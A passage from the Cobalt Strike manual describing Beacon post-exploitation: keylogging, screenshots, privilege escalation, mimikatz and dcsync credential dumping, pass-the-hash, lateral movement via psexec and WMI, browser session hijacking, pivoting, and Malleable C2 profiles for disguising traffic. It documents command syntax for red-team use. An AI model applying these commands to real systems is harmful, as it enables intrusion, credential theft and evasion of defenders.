candidate for this tool. This variant of the screenshot command will take one screenshot and exit. You may use `screenshot pid architecture time` to ask the screenshot tool to run for some number of seconds and report a screenshot each time Beacon checks in. This is a handy way to watch a user’s desktop.

When Beacon receives new screenshots or keystrokes, it will post a message to the Beacon console. The screenshot and keystroke information is not available through the Beacon console though. Go to View -> Keystrokes to see logged keystrokes across all of your Beacon sessions. Go to View -> Screenshots to browse through screenshots from all of your Beacon sessions. Both of these dialogs update as new information comes in. These dialogs make it easy for one operator to monitor keystrokes and screenshots on all of your Beacon sessions.

### 8.11 Post-Exploitation Jobs
Several Beacon features run as jobs in another process (e.g., the keystroke logger and screenshot tool). These jobs run in the background and report their output when it’s available. Use the `jobs` command to see which jobs are running in your Beacon. Use `jobkill [job number]` to kill a job.

### 8.12 The Process Browser
The Process Browser does the obvious; it tasks a Beacon to show a list of processes and shows this information to you. The Process Browser is also a convenient place to impersonate a token from another process, deploy the screenshot tool, or deploy the keystroke logger. Highlight one or more processes and press the appropriate button at the bottom of the tab.

<table>
<thead>
<tr>
<th>PID</th>
<th>PPID</th>
<th>Name</th>
<th>Arch</th>
<th>Session</th>
<th>User</th>
</tr>
</thead>
<tbody>
<tr>
<td>1028</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\NETWORK ...</td>
</tr>
<tr>
<td>1160</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\LOCAL SER...</td>
</tr>
<tr>
<td>1275</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\LOCAL SER...</td>
</tr>
<tr>
<td>1708</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\LOCAL SER...</td>
</tr>
<tr>
<td>1740</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\NETWORK ...</td>
</tr>
<tr>
<td>1988</td>
<td>4418</td>
<td>svchost.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\SYSTEM</td>
</tr>
<tr>
<td>1096</td>
<td>4418</td>
<td>SearchIndexer.exe</td>
<td>x86</td>
<td>0</td>
<td>NT AUTHORITY\SYSTEM</td>
</tr>
<tr>
<td>1536</td>
<td>4418</td>
<td>taskhost.exe</td>
<td>x86</td>
<td>1</td>
<td>GLITTER\whatta.hogg</td>
</tr>
<tr>
<td>608</td>
<td>754</td>
<td>dwm.exe</td>
<td>x86</td>
<td>1</td>
<td>GLITTER\whatta.hogg</td>
</tr>
<tr>
<td>1620</td>
<td>1600</td>
<td>explorer.exe</td>
<td>x86</td>
<td>1</td>
<td>GLITTER\whatta.hogg</td>
</tr>
<tr>
<td>3788</td>
<td>4418</td>
<td>taskhost.exe</td>
<td>x86</td>
<td>1</td>
<td>GLITTER\whatta.hogg</td>
</tr>
</tbody>
</table>

![Figure 33. Process Browser](image)

If you highlight multiple Beacons and task them to show processes, Cobalt Strike will show a Process Browser that also states which host the process comes from. This variant of the Process Browser is a convenient way to deploy Beacon’s post-exploitation tools to multiple systems at once. Simply sort by process name, highlight the interesting processes on your
target systems, and press the Screenshot or Log Keystrokes button to deploy these tools to all highlighted systems.

### 8.13 Desktop Control
To interact with a desktop on a target host, go to [beacon] -> Explore -> Desktop (VNC). This will stage a VNC server into the memory of the current process and tunnel the connection through Beacon.

When the VNC server is ready, Cobalt Strike will open a tab labeled Desktop *HOST*.

![Figure 34. Cobalt Strike Desktop Viewer](image)

The bottom of the desktop tab has several buttons. These are:

- 🔄 Refresh the screen
- 📺 View only
- 🔫 Decrease Zoom
- 🔬 Increase Zoom
- 🔍 Zoom to 100%
- 🔜 Adjust Zoom to Fit Tab
- 📐 Send Ctrl+Alt+Delete
- 🟢 Send Ctrl+Escape
- 📜 Lock the Ctrl key
- ✋ Lock the Alt key

If you can’t type in a Desktop tab, check the state of the Ctrl and Alt buttons. When either button is pressed, all of your keystrokes are sent with the Ctrl or Alt modifier. Press the Ctrl or Alt button to turn off this behavior. Make sure View only isn’t pressed either. To prevent you from accidentally moving the mouse, View only is pressed by default.
You may also use Beacon’s `desktop` command to inject a VNC server into a specific process. Use `desktop pid architecture low|high`. The last parameter let’s you specify a quality for the VNC session.

### 8.14 Privilege Escalation

Some post-exploitation commands require system administrator-level rights. Beacon includes several options to help you elevate your access. Many of Beacon’s privilege escalation options accept a listener as a parameter. This is an ideal situation to use the SMB Beacon. The SMB Beacon uses a named pipe to send its output and get its tasks through another Beacon. The SMB Beacon paired with a privilege escalation attack saves you the trouble of figuring out how to get your elevate access to egress.

#### Elevate with an Exploit

Type `elevate` to list privilege escalation exploits registered with Cobalt Strike. Run `elevate [exploit name] [listener]` to attempt to elevate with a specific exploit. You may also launch one of these exploits through `[beacon] -> Access -> Elevate`.

To start your privilege escalation exploit collection, download the Elevate Kit. The Elevate Kit is an Aggressor Script that integrates several open source privilege escalation exploits into Cobalt Strike. [https://github.com/rsmudge/ElevateKit](https://github.com/rsmudge/ElevateKit)

#### Elevate with Known Credentials

Use `runas [DOMAIN\user] [password] [command]` to run a command as another user using their credentials. The runas command will not return any output. You may use runas from a non-privileged context though.

Use `spawnas [DOMAIN\user] [password] [listener]` to spawn a session as another user using their credentials. This command uses PowerShell to bootstrap a payload in memory. You may also go to `[beacon] -> Access -> Spawn As` to run this command as well.

With both of these commands, be aware that credentials for a non-SID 500 account will spawn a payload in a medium integrity context. You will need to use Bypass UAC to elevate to a high integrity context. Also, be aware, that you should run these commands from a working folder that the specified account can read.

#### Get SYSTEM

Use `getsystem` to impersonate a token for the SYSTEM account. This level of access may allow you to perform privileged actions that are not possible as an Administrator user.

#### UAC Bypass

Microsoft introduced User Account Control (UAC) in Windows Vista and refined it in Windows 7. UAC works a lot like sudo in UNIX. Day-to-day a user works with normal privileges. When the user needs to perform a privileged action—the system asks if they would like to elevate their rights.
Use **bypassuac [listener]** to spawn a session in a process with elevated rights. This privilege escalation technique takes advantage of a loophole in the UAC default settings on Windows 7 and later. This command will not work if the current user is not in the Administrators group or if UAC is set to its highest setting. To check if the current user is in the Administrators group, use **shell whoami /groups**.

Beacon’s UAC bypass will drop a DLL file to disk and remove the DLL when it’s done. Beacon uses Cobalt Strike’s Artifact Kit to generate this DLL.

The bypassuac command launches the uac-dll exploit available to the elevate command. The Elevate Kit includes UAC bypass options that may work better against the latest versions of Windows.

**8.15 Mimikatz**
Beacon integrates mimikatz. Use the mimikatz command to pass any command to mimikatz’s command dispatcher. For example, **mimikatz standard::coffee** will give you a cup of coffee. Beacon will take care to inject a mimikatz instance that matches the native architecture of your target.

Some mimikatz commands must run as SYSTEM to work. Prefix a command with a ! to force mimikatz to elevate to SYSTEM before it runs your command. For example, **mimikatz !lsa::cache** will recover salted password hashes cached by the system.

Once in awhile, you may need to run a mimikatz command with Beacon’s current access token. Prefix a command with a @ to force mimikatz to impersonate Beacon’s current access token. For example, **mimikatz @lsadump::dcsync** will run the dcsync command in mimikatz with Beacon’s current access token.

**8.16 Credential and Hash Harvesting**
To dump hashes, go to [beacon] -> Access -> Dump Hashes. You may also use the hashdump command from the Beacon console. These commands will spawn a job that injects into LSASS and dumps the password hashes for local users on the current system.

The logonpasswords command will use mimikatz to recover plaintext passwords and hashes for users who are logged on to the current system. The logonpasswords command is the same as [beacon] -> Access -> Run Mimikatz.

Use **dcsync [DOMAIN.FQDN] [DOMAIN\user]** to pull a password hash for a user from the domain controller. This technique uses Windows APIs built to sync information between domain controllers. It requires a domain administrator trust relationship. Beacon uses mimikatz to execute this technique.

Credentials dumped with these commands are collected by Cobalt Strike and stored in the credentials data model. Go to View -> Credentials to pull up the credentials on the current team server.
8.17 Port Scanning
Beacon has a built in port scanner. Use `portscan [targets] [ports] [discovery method]` to start the port scanner job. You may specify a comma-separated list of target ranges. The same goes for ports as well. For example, `portscan 172.16.48.0/24 1-1024,8080` will scan hosts 172.16.48.0 through 172.16.48.255 on ports 1 to 1024 and 8080.

There are three target discovery options. The `arp` method uses an ARP request to discover if a host is alive or not. The `icmp` method sends an ICMP echo request to check if a target is alive. The `none` option tells the portscan tool to assume that all hosts are alive.

The port scanner will run, in between Beacon check ins. When it has results to report, it will send them to the Beacon console. Cobalt Strike will process this information and update the targets model with the discovered hosts.

8.18 Network and Host Enumeration
Beacon’s net module provides tools to interrogate and discover targets in a Windows active directory network. Use the `net dclist` command to find the domain controller for the domain the target is joined to. Use the `net view` command to find targets on the domain the target is joined to. Both of these commands populate the targets model as well. The `net computers` command finds targets by querying computer account groups on a Domain Controller.

The commands in Beacon’s net module are built on top of the Windows Network Enumeration APIs. Most of these commands are direct replacements for many of the built-in net commands in Windows. There are also a few unique capabilities here as well. For example, use `net localgroup \TARGET` to list the groups on another system. Use `net localgroup \TARGET group name` to list the members of a group on another system. These commands are great during lateral movement when you have to find who is a local admin on another system.

Use `help net` to get a list of all the commands in Beacon’s net module. Use `help net command` to get help for each individual command.

8.19 Trust Relationships
The heart of Windows single sign-on is the access token. When a user logs onto a Windows host, an access token is generated. This token contains information about the user and their rights. The access token also holds information needed to authenticate the current user to another system on the network. Impersonate or generate a token and Windows will use its information to authenticate to a network resource for you.

Use `steal_token [process id]` to impersonate a token from an existing process. If you’d like to see which processes are running use `ps`. The `getuid` command will print your current token. Use `rev2self` to revert back to your original token.

If you know credentials for a user; use `make_token [DOMAIN\user] [password]` to generate a token that passes these credentials. This token is a copy of your current token
with modified single sign-on information. It will show your current username. This is expected behavior.

Use mimikatz to pass-the-hash with Beacon. The Beacon command `pth [DOMAIN\user] [ntlm hash]` will create and impersonate an access token to pass the specified hash.

Beacon’s Make Token dialog `([beacon] -> Access -> Make Token)` is a front-end for these commands. It will present the contents of the credential model and it will use the right command to turn the selected credential entry into an access token.

**Kerberos Tickets**

Use `kerberos_ticket_use [/path/to/ticket]` to inject a Kerberos ticket into the current session. This will allow Beacon to interact with remote systems using the rights in this ticket. Try this with a Golden Ticket generated by mimikatz 2.0.

Use `kerberos_ticket_purge` to clear any kerberos tickets associated with your session.

**8.20 Lateral Movement**

Once you have a token for a domain admin or a domain user who is a local admin on a target, you may abuse this trust relationship to get control of the target. Cobalt Strike’s Beacon has several built-in options for lateral movement.

Use Beacon’s `psexec [target] [share] [listener]` to execute a payload on a remote host. This command will generate a Windows Service executable for your listener, copy it to the share you specify, create a service, start the service, and clean up after itself. Default shares include ADMIN$ and C$.

Use `psexec_psh [target] [listener]` to execute a payload on a remote host with PowerShell. This command will create a service to run a PowerShell one-liner, start it, and clean up after itself. This method of lateral movement is useful if you do not want to touch disk.

Beacon’s `winrm [target] [listener]` command will use WinRM to execute a payload on a remote host. This option requires that WinRM is enabled on the target system. It’s off by default. This option uses PowerShell to bootstrap your payload on target.

Finally, use `wmi [target] [listener]` to deliver a payload via Windows Management Instrumentation. This command uses PowerShell to bootstrap your payload on target.

**8.21 Lateral Movement GUI**

Cobalt Strike also provides a GUI to make lateral movement easier. Switch to the Targets Visualization or go to View -> Targets. Navigate to [target] -> Login and choose your desired lateral movement option.

The following dialog will open:
To use this dialog:

First, decide which trust you want to use for lateral movement. If you want to use the token in one of your Beacons, check the *Use session's current access token* box. If you want to use credentials or hashes for lateral movement—that's OK too. Select credentials from the credential store or populate the User, Password, and Domain fields. Beacon will use this information to generate an access token for you. Keep in mind, you need to operate from a high integrity context [administrator] for this to work.

Next, choose the listener to use for lateral movement. The SMB Beacon is usually a good candidate here.

Last, select which session you want to perform the lateral movement attack from. Cobalt Strike’s asynchronous model of offense requires each attack to execute from a compromised system. There is no option to perform this attack without a Beacon session to attack from. If you’re on an internal engagement, consider hooking a Windows system that you control and use that as your starting point to attack other systems with credentials or hashes.

Press **Launch**. Cobalt Strike will activate the tab for the selected Beacon and issue commands to it. Feedback from the attack will show up in the Beacon console.
9. Browser Pivoting

9.1 Overview
Malware like Zeus and its variants inject themselves into a user’s browser to steal banking information. This is a man-in-the-browser attack. So-called, because the attacker is injecting malware into the target’s browser.

Man-in-the-browser malware uses two approaches to steal banking information. They either capture form data as it’s sent to a server. For example, malware might hook PR_Write in Firefox to intercept HTTP POST data sent by Firefox. Or, they inject JavaScript onto certain webpages to make the user think the site is requesting information that the attacker needs.

Cobalt Strike offers a third approach for man-in-the-browser attacks. It lets the attacker hijack authenticated web sessions—all of them. Once a user logs onto a site, an attacker may ask the user’s browser to make requests on their behalf. Since the user’s browser is making the request, it will automatically re-authenticate to any site the user is already logged onto. I call this a browser pivot—because the attacker is pivoting their browser through the compromised user’s browser.

![Browser Pivoting in Action](image)

Cobalt Strike’s implementation of browser pivoting for Internet Explorer injects an HTTP proxy server into the compromised user’s browser. Do not confuse this with changing the user’s proxy settings. This proxy server does not affect how the user gets to a site. Rather,
this proxy server is available to the attacker. All requests that come through it are fulfilled by the user’s browser.

For a penetration tester, this approach to a man-in-the-browser attack is interesting. Here’s why:

- **It’s site agnostic.** You don’t have to customize the attack for each site you want to target. This is good, because penetration tests are time constrained.

- **The browser pivot is a very visual demonstration.** You open your browser and go to a sensitive site. Voila, you’re there as the user. This is a very powerful way to demonstrate risk to an executive and convey what an advanced threat actor could do once they compromise a system.

- **It’s hard to detect.** All of the attacker’s activity is mixed in with the user’s legitimate activity. All requests come from the same browser. How do you sort this out? If you’re a penetration tester replicating an advanced actor, you want capability in your kit that challenges your customers.

### 9.2 Setup

To setup Browser pivoting, go to [beacon] -> **Explore -> Browser Pivot.** Choose the Internet Explorer instance that you want to inject into. You may also decide which port to bind the browser pivoting proxy server to as well.

![Browser Pivot Dialog](image)

**Figure 37. Start a Browser Pivot**

Beware that the process you inject into matters a great deal. Inject into Internet Explorer to inherit a user’s authenticated web sessions. Modern versions of Internet Explorer spawn each tab in its own process. If your target uses a modern version of Internet Explorer, you must inject a process associated with an open tab to inherit session state. Which tab process doesn’t matter (child tabs share session state). Identify Internet Explorer tab processes by looking at the PPID value in the Browser Pivoting setup dialog. If the PPID references explorer.exe, the process is not associated with a tab. If the PPID references
iexplore.exe, the process is associated with a tab. Cobalt Strike will show a checkmark next to the processes it thinks you should inject into.

Once Browser Pivoting is setup, set up your web browser to use the Browser Pivot Proxy server. Remember, Cobalt Strike’s Browser Pivot server is an HTTP proxy server.

![Connection Settings](image)

**Figure 38. Configure Browser Settings**

### 9.3 Use
You may browse the web as your target user once browser pivoting is started. Beware that the browser pivoting proxy server will present its SSL certificate for SSL-enabled websites you visit. This is necessary for the technology to work.

The browser pivoting proxy server will ask you to add a host to your browser’s trust store when it detects an SSL error. Add these hosts to the trust store and press refresh to make SSL protected sites load properly.

To stop the Browser Pivot proxy server, type `browserpivot stop` in its Beacon console.

You will need to reinject the browser pivot proxy server if the user closes the tab you’re working from. The Browser Pivot tab will warn you when it can’t connect to the browser pivot proxy server in the browser.

### 9.4 How it Works
Internet Explorer delegates all of its communication to a library called WinINet. This library, which any program may use, manages cookies, SSL sessions, and server authentication for its consumers. Cobalt Strike’s Browser Pivoting takes advantage of the fact that WinINet transparently manages authentication and reauthentication on a per-process basis. By injecting Cobalt Strike’s Browser Pivoting technology into a user’s Internet Explorer instance, you get this transparent reauthentication for free.
10. Pivoting

10.1 What is Pivoting
Pivoting, for the sake of this manual, is turning a compromised system into a hop point for other attacks and tools. Cobalt Strike’s Beacon provides several pivoting options. For each of these options, you will want to make sure your Beacon is in interactive mode. Interactive mode is when a Beacon checks in multiple times each second. Use the sleep 0 command to put your Beacon into interactive mode.

10.2 SOCKS Proxy
Go to [beacon] -> Pivoting -> SOCKS Server to setup a SOCKS4a proxy server on your team server. Or, use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose).

All connections that go through these SOCKS servers turn into connect, read, write, and close tasks for the associated Beacon to execute. You may tunnel via SOCKS through any type of Beacon (even an SMB Beacon).

Beacon’s HTTP data channel is the most responsive for pivoting purposes. If you’d like to pivot traffic over DNS, use the DNS TXT record communication mode.

To see the SOCKS servers that are currently setup, go to View -> Proxy Pivots.

Use socks stop to disable the SOCKS proxy server.

Proxychains
The proxychains tool will force an external program to use a SOCKS proxy server that you designate. You may use proxychains to force third-party tools through Cobalt Strike’s SOCKS server. To learn more about proxychains, visit:


Metasploit
You may also tunnel Metasploit Framework exploits and modules through Beacon. Create a Beacon SOCKS proxy server [as described above] and paste the following into your Metasploit Framework console:

```
setg Proxies socks4:team server IP:proxy port
setg ReverseAllowProxy true
```

These commands will instruct the Metasploit Framework to apply your Proxies option to all modules executed from this point forward. Once you’re done pivoting through Beacon in this way, use unsetg Proxies to stop this behavior.
If you find the above tough to remember, go to **View -> Proxy Pivots**. Highlight the proxy pivot you setup and press **Tunnel**. This button will provide the setg Proxies syntax needed to tunnel the Metasploit Framework through your Beacon.

### 10.3 Reverse Port Forward

Use the **rportfwd** command to setup a reverse pivot through Beacon. The rportfwd command will bind a port on the compromised target. Any connections to this port will cause your Cobalt Strike server to initiate a connection to another host and port and relay traffic between these two connections. Cobalt Strike tunnels this traffic through Beacon. The syntax for rportfwd is: **rportfwd [bind port] [forward host] [forward port]**.

Use **rportfwd stop [bind port]** to disable the reverse port forward.

### 10.4 Pivot Listeners

It's good tradecraft to limit the number of direct connections from your target's network to your command and control infrastructure. A pivot listener allows you to create a listener that tunnels all of its traffic through a Beacon session. In this way, you can create new reverse sessions without creating more direct connections to your command and control infrastructure.

To setup a pivot listener, go to **[beacon] -> Pivoting -> Listener...**. This will open a dialog where you may define a new pivot listener.

![Figure 39. Configure a Pivot Listener](image)

A pivot listener consists of a Listen Host and a Listen Port. This defines where a pivot listener should stage through and which port the pivot host should listen on. Cobalt Strike's pivot listener will create a foreign listener that references this information.
The Remote Host and Remote Port define where Cobalt Strike’s team server should forward connections to your pivot listener to. Cobalt Strike will use this information to create a reverse port forward through a Beacon that forwards connections from Local Port to the specified Remote Host and Remote Port.

Be aware that Beacon is an asynchronous payload. For a Pivot Listener to properly service connections and tunnel traffic—you must speed up the pivot Beacon such that it checks in multiple times each second. This is known as interactive mode.

Pivot Listeners do not change the pivot host's firewall configuration. If a pivot host has a host-based firewall, this may interfere with the reverse port forward. You, the operator, are responsible for anticipating this situation and taking the right steps for it.

10.5 Covert VPN
VPN pivoting is a flexible way to tunnel traffic without the limitations of a proxy pivot. Cobalt Strike offers VPN pivoting through its Covert VPN feature. Covert VPN creates a network interface on the Cobalt Strike system and bridges this interface into the target’s network.

![Deploy VPN Client](image)

**Figure 40. Deploy Covert VPN**

To activate Covert VPN, right-click a compromised host, go to [beacon] -> Pivoting -> Deploy VPN. Select the remote interface you would like Covert VPN to bind to. If no local interface is present, press Add to create one.

Check **Clone host MAC address** to make your local interface have the same MAC address as the remote interface. It’s safest to leave this option checked.

Press **Deploy** to start the Covert VPN client on the target. Covert VPN requires Administrator access to deploy.
Once a Covert VPN interface is active, you may use it like any physical interface on your system. Use ifconfig to configure its IP address. If your target network has a DHCP server, you may request an IP address from it using your operating systems built-in tools.

To manage your Covert VPN interfaces, go to **Cobalt Strike -> Interfaces**. Here, Cobalt Strike will show the Covert VPN interfaces, how they’re configured, and how many bytes were transmitted and received through each interface.

Highlight an interface and press **Remove** to destroy the interface and close the remote Covert VPN client. Covert VPN will remove its temporary files on reboot and it automatically undoes any system changes right away.

Press **Add** to configure a new Covert VPN interface.

![Setup Interface](image)

**Figure 41. Setup a Covert VPN Interface**

Covert VPN interfaces consist of a network tap and a channel to communicate 59thernet frames through. To configure the interface, choose an Interface name (this is what you will manipulate through ifconfig later) and a MAC address.

You must also configure the Covert VPN communication channel for your interface. Covert VPN may communicate Ethernet frames over a UDP connection, TCP connection, ICMP, or using the HTTP protocol. The TCP (Reverse) channel has the target connect to your Cobalt Strike instance. The TCP (Bind) channel has Cobalt Strike tunnel the VPN through Beacon.

Cobalt Strike will setup and manage communication with the Covert VPN client based on the Local Port and Channel you select.

The Covert VPN HTTP channel makes use of the Cobalt Strike web server. You may host other Cobalt Strike web applications and multiple Covert VPN HTTP channels on the same port.
For best performance, use the UDP channel. The UDP channel has the least amount of overhead compared to the TCP and HTTP channels. Use the ICMP, HTTP, or TCP (Bind) channels if you need to get past a restrictive firewall.

While Covert VPN has a flexibility advantage, your use of a VPN pivot over a proxy pivot will depend on the situation. Covert VPN requires Administrator access. A proxy pivot does not. Covert VPN creates a new communication channel. A proxy pivot does not. You should use a proxy pivot initially and move to a VPN pivot when it’s needed.
11. SSH Sessions

11.1 The SSH Client
Cobalt Strike controls UNIX targets with a built-in SSH client. This SSH client receives tasks from and routes its output through a parent Beacon.

Use `ssh [target] [user] [password]` to launch an SSH session from a Beacon. You may also use `ssh-key [target] [user] [/path/to/key.pem]` to authenticate with a key.

These commands run Cobalt Strike’s SSH client. The client will report any connection or authentication issues to the parent Beacon. If the connection succeeds, you will see a new session in Cobalt Strike’s display. This is an SSH session. Right-click on this session and press `Interact` to open the SSH console.

Type `help` to see a list of commands the SSH session supports. Type `help` followed by a command name for details on that command.

11.2 Running Commands
The `shell` command will run the command and arguments you provide. Running commands block the SSH session for up to 20s before Cobalt Strike puts the command in the background. Cobalt Strike will report output from these long running commands as it becomes available.

Use `sudo [password] [command + arguments]` to attempt to run a command via sudo. This alias requires the target’s sudo to accept the –S flag.

The `cd` command will change the current working directory for the SSH session. The `pwd` command reports the current working directory.

11.3. Upload and Download Files
The `upload` command will upload a file to the current working directory. The `download` command will download a file. Files downloaded with the download command are available under `View -> Downloads`. You may also type `downloads` to see file downloads in progress. The `cancel` command will cancel a download that’s in progress.

11.4 SOCKS Pivoting and Reverse Port Forwards
Use the `socks` command to create a SOCKS server on your team server that forwards traffic through the SSH session. The `rportfwd` command will also create a reverse port forward that routes traffic through the SSH session and your Beacon chain.

There is one caveat to rportfwd: the rportfwd command asks the SSH daemon to bind to all interfaces. It’s quite likely the SSH daemon will override this and force the port to bind to localhost. You need to change the GatewayPorts option for the SSH daemon to yes or clientspecified.
12. Malleable Command and Control

12.1 Overview
Many Beacon indicators are controlled by a Malleable C2 profile. A Malleable C2 profile consists of settings and data transforms. A data transform is a simple program that specifies how to transform data and store it in a transaction. The same program that transforms and stores data, interpreted backwards, also extracts and recovers data from a transaction.

To use a custom profile, you must start a Cobalt Strike team server and specify your profile at that time.

./teamsert [external IP] [password] [/path/to/my.profile]

You may only load one profile per Cobalt Strike instance. If you need multiple profiles, start multiple team servers [each with its own profile]. You may control these servers from one Cobalt Strike client.

12.2 Checking for Errors
Cobalt Strike’s Linux package includes a c2lint program. This program will check the syntax of a communication profile, apply a few extra checks, and even unit test your profile with random data. It’s highly recommended that you check your profiles with this tool before you load them into Cobalt Strike.

./c2lint [/path/to/my.profile]

12.3 Profile Language
The best way to create a profile is to modify an existing one. Several example profiles are available on Github:

- https://github.com/rsmudge/Malleable-C2-Profiles

When you open a profile, here is what you will see:

```plaintext
# this is a comment
set global_option "value";

protocol-transaction {
    set local_option "value";

    client {
        # customize client indicators
    }
}

server {
```
# customize server indicators
}
}

Comments begin with a # and go until the end of the line. The set statement is a way to assign a value to an option. Profiles use { curly braces } to group statements and information together. Statements always end with a semi-colon.

To help all of this make sense, here’s a partial profile:

```plaintext
http-get {
    set uri "/foobar";
    client {
        metadata {
            base64;
            prepend "user=";
            header "Cookie";
        }
    }
}
```

This partial profile defines indicators for an HTTP GET transaction. The first statement, set uri, assigns the URI that the client and server will reference during this transaction. This set statement occurs outside of the client and server code blocks because it applies to both of them.

The client block defines indicators for the client that performs an HTTP GET. The client, in this case, is Cobalt Strike’s Beacon.

When Cobalt Strike’s Beacon “phones home” it sends metadata about itself to Cobalt Strike. In this profile, we have to define how this metadata is encoded and sent with our HTTP GET request.

The metadata keyword followed by a group of statements specifies how to transform and embed metadata into our HTTP GET request. The group of statements, following the metadata keyword, is called a data transform.

<table>
<thead>
<tr>
<th>Step</th>
<th>Action</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.</td>
<td>Start</td>
<td>metadata</td>
</tr>
<tr>
<td>1.</td>
<td>base64</td>
<td>Base64 Encode</td>
</tr>
<tr>
<td>2.</td>
<td>prepend &quot;user=&quot;</td>
<td>Prepend String</td>
</tr>
<tr>
<td>3.</td>
<td>header &quot;Cookie&quot;</td>
<td>Store in Transaction</td>
</tr>
</tbody>
</table>

The first statement in our data transform states that we will base64 encode our metadata [1]. The second statement, prepend, takes our encoded metadata and prepends the string user= to it [2]. Now our transformed metadata is “user=”. base64(metadata). The third
statement states we will store our transformed metadata into a client HTTP header called Cookie [3]. That’s it.

Both Beacon and its server consume profiles. Here, we’ve read the profile from the perspective of the Beacon client. The Beacon server will take this same information and interpret it backwards. Let’s say our Cobalt Strike web server receives a GET request to the URI /foobar. Now, it wants to extract metadata from the transaction.

<table>
<thead>
<tr>
<th>Step</th>
<th>Action</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.</td>
<td>Start</td>
<td></td>
</tr>
<tr>
<td>1.</td>
<td>header &quot;Cookie&quot;</td>
<td>Recover from Transaction</td>
</tr>
<tr>
<td></td>
<td></td>
<td>user=bWV0YWRhdGE=</td>
</tr>
<tr>
<td>2.</td>
<td>prepend &quot;user=&quot;</td>
<td>Remove first 5 characters</td>
</tr>
<tr>
<td></td>
<td></td>
<td>bWV0YWRhdGE=</td>
</tr>
<tr>
<td>3.</td>
<td>base64</td>
<td>Base64 Decode</td>
</tr>
<tr>
<td></td>
<td></td>
<td>metadata</td>
</tr>
</tbody>
</table>

The header statement will tell our server where to recover our transformed metadata from [1]. The HTTP server takes care to parse headers from the HTTP client for us. Next, we need to deal with the prepend statement. To recover transformed data, we interpret prepend as remove the first X characters [2], where X is the length of the original string we prepended. Now, all that’s left is to interpret the last statement, base64. We used a base64 encode function to transform the metadata before. Now, we use a base64 decode to recover the metadata [3].

We will have the original metadata once the profile interpreter finishes executing each of these inverse statements.

**Data Transform Language**
A data transform is a sequence of statements that transform and transmit data. The data transform statements are:

<table>
<thead>
<tr>
<th>Statement</th>
<th>Action</th>
<th>Inverse</th>
</tr>
</thead>
<tbody>
<tr>
<td>append “string”</td>
<td>Append “string”</td>
<td>Remove last LEN(“string”) characters</td>
</tr>
<tr>
<td>base64</td>
<td>Base64 Encode</td>
<td>Base64 Decode</td>
</tr>
<tr>
<td>base64url</td>
<td>URL-safe Base64 Encode</td>
<td>URL-safe Base64 Decode</td>
</tr>
<tr>
<td>netbios</td>
<td>NetBIOS Encode ‘a’</td>
<td>NetBIOS Decode ‘a’</td>
</tr>
<tr>
<td>netbiosu</td>
<td>NetBIOS Encode ‘A’</td>
<td>NetBIOS Decode ‘A’</td>
</tr>
<tr>
<td>prepend “string”</td>
<td>Prepend “string”</td>
<td>Remove first LEN(“string”) characters</td>
</tr>
</tbody>
</table>

A data transform is a combination of any number of these statements, in any order. For example, you may choose to netbios encode the data to transmit, prepend some information, and then base64 encode the whole package.

A data transform always ends with a termination statement. You may only use one termination statement in a transform. This statement tells Beacon and its server where in the transaction to store the transformed data.
There are four termination statements.

<table>
<thead>
<tr>
<th>Statement</th>
<th>What</th>
</tr>
</thead>
<tbody>
<tr>
<td>header “header”</td>
<td>Store data in an HTTP header</td>
</tr>
<tr>
<td>parameter “key”</td>
<td>Store data in a URI parameter</td>
</tr>
<tr>
<td>print</td>
<td>Send data as transaction body</td>
</tr>
<tr>
<td>uri-append</td>
<td>Append to URI</td>
</tr>
</tbody>
</table>

The header termination statement stores transformed data in an HTTP header. The parameter termination statement stores transformed data in an HTTP parameter. This parameter is always sent as part of URI. The print statement sends transformed data in the body of the transaction.

The print statement is the expected termination statement for the http-get.server.output and http-post.server.output blocks. You may use the header, parameter, print and uri-append termination statements for the other blocks.

If you use a header, parameter, or uri-append termination statement on http-post.client.output, Beacon will chunk its responses to a reasonable length to fit into this part of the transaction.

These blocks and the data they send are described in a later section.

**Strings**

Beacon’s Profile Language allows you to use “strings” in several places. In general, strings are interpreted as-is. However, there are a few special values that you may use in a string:

<table>
<thead>
<tr>
<th>Value</th>
<th>Special Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>&quot;n&quot;</td>
<td>Newline character</td>
</tr>
<tr>
<td>&quot;r&quot;</td>
<td>Carriage Return</td>
</tr>
<tr>
<td>&quot;t&quot;</td>
<td>Tab character</td>
</tr>
<tr>
<td>\u####</td>
<td>A unicode character</td>
</tr>
<tr>
<td>\x##</td>
<td>A byte (e.g., \x41 = ‘A’)</td>
</tr>
<tr>
<td>&quot;&quot;</td>
<td>\</td>
</tr>
</tbody>
</table>

**Headers and Parameters**

Data transforms are an important part of the indicator customization process. They allow you to dress up data that Beacon must send or receive with each transaction. You may add extraneous indicators to each transaction too.

In an HTTP GET or POST request, these extraneous indicators come in the form of headers or parameters. Use the parameter statement within the client block to add an arbitrary parameter to an HTTP GET or POST transaction.
This code will force Beacon to add ?bar=blah to the /foobar URI when it makes a request.

```
http-get {
    client {
        parameter "bar" "blah";
    }
}
```

Use the header statement within the client or server blocks to add an arbitrary HTTP header to the client’s request or server’s response. This header statement adds an indicator to put network security monitoring teams at ease.

```
http-get {
    server {
        header "X-Not-Malware" "I promise!";
    }
}
```

The Profile interpreter will interpret your header and parameter statements in order. That said, the WinInet library (client) and Cobalt Strike web server have the final say about where in the transaction these indicators will appear.

**Options**

You may configure Beacon’s defaults through the profile file. There are two types of options: global and local options. The global options change a global Beacon setting. Local options are transaction specific. You must set local options in the right context. Use the set statement to set an option.

```
set "sleeptime" "1000";
```

Here are a few options:

<table>
<thead>
<tr>
<th>Option</th>
<th>Context</th>
<th>Default Value</th>
<th>Changes</th>
</tr>
</thead>
<tbody>
<tr>
<td>create_remote_thread</td>
<td>true</td>
<td>true</td>
<td>Allow Beacon to create threads in other processes.</td>
</tr>
<tr>
<td>dns_idle</td>
